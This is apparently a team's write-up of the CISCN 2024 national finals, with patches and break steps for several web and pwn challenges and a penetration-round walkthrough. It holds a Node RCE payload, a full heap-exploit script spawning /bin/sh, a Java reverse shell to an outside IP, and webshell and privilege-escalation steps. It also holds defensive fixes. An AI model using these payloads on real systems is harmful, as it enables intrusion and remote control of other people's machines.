Writeup for the Finals of the 17th National College Student Information Security Contest (Innovative Practice Ability Competition), by team 圣地亚哥皮蛋战队:
It has been a while since we posted on the public account, so first a few sentimental words:
All along the way, generation after generation, through wind and rain, nothing has ever put out the passion for cyber security in the hearts of the 皮蛋 members...
First, best wishes to sp4c1ous, Cat and AndyNoel, three veterans who spent four years in the 皮蛋 factory and are about to move on to their next stop. There is no grand retirement ceremony, but the baton of a new era has quietly arrived, so let us raise a glass together: to the road behind us, to those who walked it with us; the road ahead is long, take care of yourselves. 圣地亚哥皮蛋厂 will always be your purest home, remember to come back and visit.
The waves of the Yangtze push on those before them; may every young person who loves cyber security find where they belong, and may 圣地亚哥皮蛋战队 go further and further on the road ahead.
-- from Ic4_F1ame
Now on to this tense and exciting national final:
The main team was very lucky to field a luxurious 2 Web + 2 Pwn "galaxy battleship" lineup, broke out of the East China North regional smoothly and reached the final. After two days of hard fighting in the final, everyone played steadily, we set a new best CISCN result for the team, and took home 圣地亚哥皮蛋战队's first CISCN national first prize. (PS: we also successfully staged fakes0u1's farewell match; the end, confetti. We hope he is away for only half a year (just half a year, not a day more) and comes back to fight again.)
CISCN2024 AWDP:
We reacted a little slowly at the start of the AWDP; many challenges were only patched in the later rounds, which began a long chase for points, climbing from 30th place bit by bit. The final result was in line with expectations.
Web:
ezjs:
fix:
The challenge tests file upload plus rendering in a JS app; for the fix, filtering the .js file extension is enough:
break:
Bypass the login with the user name "admın".
This uses an Express parsing trick: when we can manipulate the node_modules directory, we can write an index.js into it and get RCE.
First upload the following via the upload endpoint:
exports.__express = function() {
    console.log(require('child_process').execSync("cat /flag > /app/views/upload.ejs").toString());
}
Then use rename with directory traversal
to write it to ../node_modules/ttt/index.js,
then upload another file with the .ttt extension
and render that file at the render endpoint; afterwards visit the upload route to read the result.
SolonMaster:
fix
Java deserialization attack: the serialized content comes in through data. Decode data first, then inspect its contents.
Looking at the dependencies we saw logback and snakeyaml, so the check is whether the serialized data contains either of these two classes; if it does, filter it:
byte[] decodemsg = Base64.getDecoder().decode((String)map.get("data"));
String sea = new String(decodemsg);
if(sea.contains("snack")){
    return "filtered";
}
else if(sea.contains("log")){
    return "filtered";
}
ShareCard:
fix
Class Info has an arbitrary file read via directory traversal. Filter self.avatar: filter the traversal sequence ../ as separate pieces, and also filter its URL-encoded form:
def parse_avatar(self):
    # reject traversal pieces ('..' and '/') and the URL-encoded dot
    if '..' in self.avatar or '/' in self.avatar or '%2e' in self.avatar:
        self.avatar = ''
    self.avatar = base64.b64encode(open('avatars/'+self.avatar,'rb').read()).decode()
break:
The rough idea was probably to forge a JWT with the key so that the path becomes the traversed one, but the key turned out to be RSA.random; local debugging made it look like a pseudo-random number, but without a crypto player we could not recover the key, so we did not take it further.
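As an added example (not the challenge's code and not the team's patch), here is a hardened version, in Python, of the path handling that both the ezjs upload/rename and the ShareCard avatar lookup need. Instead of blacklisting "..", "/" and "%2e", it resolves the requested path and accepts it only if the result stays under the intended root; it restricts uploads to a bare file name with an allow-listed extension; and it renders only views whose extension maps to an explicitly registered engine (the ezjs break works because Express loads a module named after an unregistered view extension). The root directories, allow-lists and function names are this example's own assumptions.

```python
import os
import posixpath
from urllib.parse import unquote

# Assumed layout for this example (not the challenge's real paths).
AVATAR_ROOT = "/srv/sharecard/avatars"
UPLOAD_ROOT = "/srv/ezjs/uploads"
# Assumed allow-lists: what the app will store, and which view extensions have a
# template engine explicitly registered. Anything else must never reach render().
ALLOWED_UPLOAD_EXT = {".png", ".jpg", ".jpeg", ".txt"}
RENDERABLE_EXT = {".ejs"}


def safe_join(root, user_path):
    """Absolute path of user_path under root, or None if it would escape root.

    The value is percent-decoded twice (one pass turns %2e into '.', a second
    catches %252e), joined, canonicalised with realpath (which also follows
    symlinks), and then accepted only if the result still has root as prefix.
    This replaces substring filters on '..', '/' and '%2e'.
    """
    if not isinstance(user_path, str) or not user_path or "\x00" in user_path:
        return None
    decoded = unquote(unquote(user_path))
    root = os.path.realpath(root)
    candidate = os.path.realpath(os.path.join(root, decoded))
    if candidate == root or not candidate.startswith(root + os.sep):
        return None
    return candidate


def is_allowed_upload_name(name):
    """Bare file name only (no directory part) with an allow-listed extension."""
    if not isinstance(name, str) or not name:
        return False
    decoded = unquote(unquote(name))
    if decoded != posixpath.basename(decoded) or "\\" in decoded:
        return False
    return posixpath.splitext(decoded)[1].lower() in ALLOWED_UPLOAD_EXT


def can_render(view_name):
    """Only views whose extension maps to a registered engine may be rendered."""
    return posixpath.splitext(view_name)[1].lower() in RENDERABLE_EXT


def avatar_path(avatar):
    """Hardened replacement for the ShareCard parse_avatar file lookup."""
    return safe_join(AVATAR_ROOT, avatar)


def upload_destination(name):
    """Where an accepted upload is stored; None if the name fails either check."""
    if not is_allowed_upload_name(name):
        return None
    return safe_join(UPLOAD_ROOT, name)
```

The prefix test on the resolved path is the part that matters: a filter that only looks for "../" substrings is always one encoding away from a bypass, while a check on where the path actually ends up is independent of how it was spelled.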
Pwn:
ezheap
break
Allocate chunks according to the data format, then use the UAF to call system("/bin/sh").
import os
import requests
import sys
import time
from pwn import *
from ctypes import *
from requests.auth import*
context.os = 'linux'
context.log_level = "debug"
s = lambda data :p.send(str(data))
sa = lambda delim,data :p.sendafter(str(delim), str(data))
sl = lambda data :p.sendline(str(data))
sla = lambda delim,data :p.sendlineafter(str(delim), str(data))
r = lambda num :p.recv(num)
ru = lambda delims, drop=True :p.recvuntil(delims, drop)
itr = lambda :p.interactive()
uu32 = lambda data :u32(data.ljust(4,b'\x00'))
uu64 = lambda data :u64(data.ljust(8,b'\x00'))
leak = lambda name,addr :log.success('{} = {:#x}'.format(name, addr))
l64 = lambda :u64(p.recvuntil(b"\x7f")[-6:].ljust(8,b"\x00"))
l32 = lambda :u32(p.recvuntil(b"\xf7")[-4:].ljust(4,b"\x00"))
context.terminal = ['gnome-terminal','-x','sh','-c']
x64_32 = 1
if x64_32:
context.arch = 'amd64'
else:
context.arch = 'i386'
#p=remote("123.57.149.79",21722)
p=process('./pwn')
elf = ELF('./pwn')
libc = ELF("./libc.so.6")
def add(idx,size,content):
p.sendlineafter("Please input:",'{"choice":"new","index":'+ str(idx)+',"length":' + str(size) + ',"message":"' + content + '"}')
def delete(idx):
p.sendlineafter("Please input:",'{"choice":"rm","index":'+ str(idx)+',"length":0,"message":"0"}')
def edit(idx,size,content,mode=0):
p.sendlineafter("Please input:",'{"choice":"modify","index":'+ str(idx)+',"length":' + str(size) + ',"message":"' + content + '"}')
def show(idx):
p.sendlineafter("Please input:",'{"choice":"view","index":'+ str(idx)+',"length":0,"message":"0"}')
def duan():
gdb.attach(p)
pause()
add(0,0x110,"AAAAAAA")
add(1,0x110,"AAAAAAA")
add(4,0x400,"BBBBBBB")
add(5,0x400,"BBBBBBB")
delete(0)
delete(1)
show(1)
#duan()
p.recvuntil("message:")
heap_addr = u64(p.recv(6).ljust(0x8,b"\x00")) - 0x4f0
leak("heap_addr ",heap_addr)
edit(2,0x65a,"A"*0x658+"\x61\x05")
delete(3)
add(0,0x30,"A"*7)
edit(4,0x8,"A"*8)
show(4)
libc.address = u64(p.recvuntil(b"\x7f")[-6:].ljust(0x8,b"\x00")) - 0x1ecbe0
leak("libc.address ",libc.address)
system = libc.sym['system']
p.sendlineafter("Please input:",b'{"choice":"modify","index":1,"length":6,"message":"' + p64(libc.sym['__free_hook'])[:6] + b'"}')
add(0,0x110,"/bin/sh")
p.sendlineafter("Please input:",b'{"choice":"new","index":1,"length":272,"message":"' + p64(system)[:6] + b'"}')
delete(5)
itr()
fix
Just patch the UAF directly; use eh_frame to place the patch.
anime
fix
Just change printf to puts.
CHR
fix
Just remove that 4.
CISCN2024 Penetration:
erp
The heapdump leaks the Shiro key; inject a 冰蝎 (Behinder) webshell for RCE
Internal network reconnaissance
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.8.146 netmask 255.255.255.0 broadcast 192.168.8.255
inet6 fe80::216:3eff:fe04:a6cd prefixlen 64 scopeid 0x20<link>
ether 00:16:3e:04:a6:cd txqueuelen 1000 (Ethernet)
RX packets 74969 bytes 52704643 (52.7 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 41507 bytes 34324294 (34.3 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 21642 bytes 1774091 (1.7 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 21642 bytes 1774091 (1.7 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
192.168.8.42:80 open
192.168.8.9:80 open
192.168.8.42:22 open
192.168.8.146:22 open
192.168.8.26:139 open
192.168.8.16:139 open
192.168.8.12:139 open
192.168.8.38:139 open
192.168.8.9:139 open
192.168.8.26:135 open
192.168.8.16:135 open
192.168.8.38:135 open
192.168.8.12:135 open
192.168.8.9:135 open
192.168.8.26:445 open
192.168.8.16:445 open
192.168.8.38:445 open
192.168.8.12:445 open
192.168.8.9:445 open
192.168.8.38:3306 open
192.168.8.9:1433 open
192.168.8.146:8080 open
192.168.8.9:8000 open
192.168.8.12:88 open
192.168.8.16:8080 open
192.168.8.26:8080 open
192.168.8.9:8172 open
192.168.8.42:8060 open
192.168.8.42:9094 open
[*] NetInfo
[*]192.168.8.9
[->]WIN-IISSERER
[->]192.168.8.9
[*] WebTitle http://192.168.8.146:8080 code:302 len:0 title:None 跳转url: http://192.168.8.146:8080/login;jsessionid=F139BD9ACD9AAD76CC4B5499F309C340
[*] WebTitle http://192.168.8.9 code:200 len:43679 title:VertexSoft
[*] NetInfo
[*]192.168.8.12
[->]RODC
[->]192.168.8.12
[*] NetInfo
[*]192.168.8.16
[->]WIN-SERVER03
[->]192.168.8.16
[*] NetBios 192.168.8.26 WORKGROUPWIN-PC3788
[*] NetBios 192.168.8.16 WORKGROUPWIN-SERVER03
[*] NetBios 192.168.8.12 [+] DC:VERTEXSOFTRODC
[*] NetBios 192.168.8.38 WORKGROUPWIN-OPS88
[*] NetBios 192.168.8.9 WORKGROUPWIN-IISSERER
[*] NetInfo
[*]192.168.8.26
[->]WIN-PC3788
[->]192.168.8.26
[*] WebTitle http://192.168.8.9:8000 code:200 len:4018 title:Modbus Monitor - VertexSoft Internal Attendance System
[*] WebTitle http://192.168.8.42:8060 code:404 len:555 title:404 Not Found
[*] NetInfo
[*]192.168.8.38
[->]WIN-OPS88
[->]192.168.8.38
[*] WebTitle http://192.168.8.146:8080/login;jsessionid=F139BD9ACD9AAD76CC4B5499F309C340 code:200 len:1383 title:Master ERP login Form
[*] WebTitle http://192.168.8.42 code:302 len:99 title:None 跳转url: http://192.168.8.42/users/sign_in
[*] WebTitle https://192.168.8.9:8172 code:404 len:0 title:None
[*] WebTitle http://192.168.8.26:8080 code:200 len:147 title:第一个 JSP 程序
[*] WebTitle http://192.168.8.16:8080 code:403 len:594 title:None
[*] WebTitle http://192.168.8.42/users/sign_in code:200 len:11166 title:登录 · GitLab
[+] PocScan http://192.168.8.146:8080 poc-yaml-spring-actuator-heapdump-file
[+] PocScan http://192.168.8.146:8080 poc-yaml-springboot-env-unauth spring2
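Added defender-side example, not part of the writeup: a small parser that turns scanner output in the format above into a per-host inventory and lists the exposures a reviewer would want to ticket (SMB/RPC/database listeners reachable from the application segment, PoC hits, and the host that NetBIOS identifies as a domain controller). The sample lines are a re-typed subset of the output above, and the port/label table is this example's own choice.

```python
import re
from collections import defaultdict

# Constructed sample: a subset of the scan output above, re-typed in the same shape.
SAMPLE_SCAN = """\
192.168.8.9:80 open
192.168.8.9:445 open
192.168.8.9:1433 open
192.168.8.146:22 open
192.168.8.146:8080 open
192.168.8.12:88 open
192.168.8.12:445 open
[*] NetBios 192.168.8.12 [+] DC:VERTEXSOFTRODC
[*] WebTitle http://192.168.8.146:8080 code:302 len:0 title:None
[+] PocScan http://192.168.8.146:8080 poc-yaml-spring-actuator-heapdump-file
[+] PocScan http://192.168.8.146:8080 poc-yaml-springboot-env-unauth spring2
"""

# Ports whose exposure on an internal segment deserves a review ticket. The labels are
# this example's own shorthand, not scanner output.
RISKY_PORTS = {
    445: "SMB reachable from app segment",
    135: "MS-RPC reachable from app segment",
    139: "NetBIOS reachable",
    1433: "MSSQL listener reachable",
    3306: "MySQL listener reachable",
    88: "Kerberos (likely domain controller)",
}

IPV4 = r"\d{1,3}(?:\.\d{1,3}){3}"
OPEN_RE = re.compile(rf"^({IPV4}):(\d{{1,5}}) open$")
POC_RE = re.compile(r"^\[\+\] PocScan (\S+) (\S+)")
NETBIOS_RE = re.compile(rf"^\[\*\] NetBios ({IPV4}) (.+)$")
URL_HOST_RE = re.compile(r"^https?://([^/:]+)")


def parse_scan(text):
    """Group open ports, NetBIOS names and PoC hits by host IP."""
    hosts = defaultdict(lambda: {"ports": set(), "netbios": None, "pocs": []})
    for line in text.splitlines():
        line = line.strip()
        if m := OPEN_RE.match(line):
            hosts[m.group(1)]["ports"].add(int(m.group(2)))
        elif m := POC_RE.match(line):
            h = URL_HOST_RE.match(m.group(1))
            if h:
                hosts[h.group(1)]["pocs"].append(m.group(2))
        elif m := NETBIOS_RE.match(line):
            hosts[m.group(1)]["netbios"] = m.group(2)
    return dict(hosts)


def findings(hosts):
    """Return (ip, finding) pairs ordered by host address."""
    out = []
    for ip, info in sorted(hosts.items(), key=lambda kv: tuple(int(x) for x in kv[0].split("."))):
        for port in sorted(info["ports"]):
            if port in RISKY_PORTS:
                out.append((ip, f"{port}/tcp: {RISKY_PORTS[port]}"))
        for poc in info["pocs"]:
            out.append((ip, f"vulnerability check hit: {poc}"))
        if info["netbios"] and "DC:" in info["netbios"]:
            out.append((ip, f"domain controller per NetBIOS: {info['netbios']}"))
    return out


if __name__ == "__main__":
    for ip, finding in findings(parse_scan(SAMPLE_SCAN)):
        print(ip, finding)
```

Run against the full output above, the same parser would show at a glance that the ERP host is the only one with an exposed actuator, and that SMB and RPC are reachable on every Windows host from the segment the ERP box sits on, which is the segmentation gap the rest of the writeup walks through.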
jenkins
Jenkins weak password admin / admin123 logs into the backend, where commands can be executed directly
Reverse shell
String host="8.130.87.84";
int port=6666;
String cmd="cmd.exe";
// ProcessBuilder creates the operating-system process
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s=new Socket(host,port);
InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();
OutputStream po=p.getOutputStream(),so=s.getOutputStream();
while(!s.isClosed()){
    while(pi.available()>0)so.write(pi.read());
    while(pe.available()>0)so.write(pe.read());
    while(si.available()>0)po.write(si.read());
    so.flush();po.flush();
    Thread.sleep(50);
    try{p.exitValue();break;}catch(Exception e){}
};
p.destroy();s.close();
gitlab
The Jenkins backend yields a GitLab token, with which the GitLab repository contents can be read directly
WIN-OPS88
MySQL weak password, UDF privilege escalation in one go
RODC
In the Administrator user's Documents directory on the MySQL machine there is an Excel sheet
RDP directly into 192.168.8.12
On the read-only domain controller the flag file under Administrator can be read directly
WIN-PC3788
Tomcat is vulnerable: a webshell can be uploaded via PUT; after getting a shell, potato privilege escalation yields the flag
Afterword:
Recruitment of the 2024 intake is about to begin. If you are interested in cyber security, come to the Cyberspace Security Lab and experience the hacker world at its finest; 圣地亚哥皮蛋战队 looks forward to having you.
Recruitment group number: 672243432
Recruitment group QR code:
Originally published on the WeChat public account (山警网络空间安全实验室): Writeup for the Finals of the 17th National College Student Information Security Contest (Innovative Practice Ability Competition), by 圣地亚哥皮蛋战队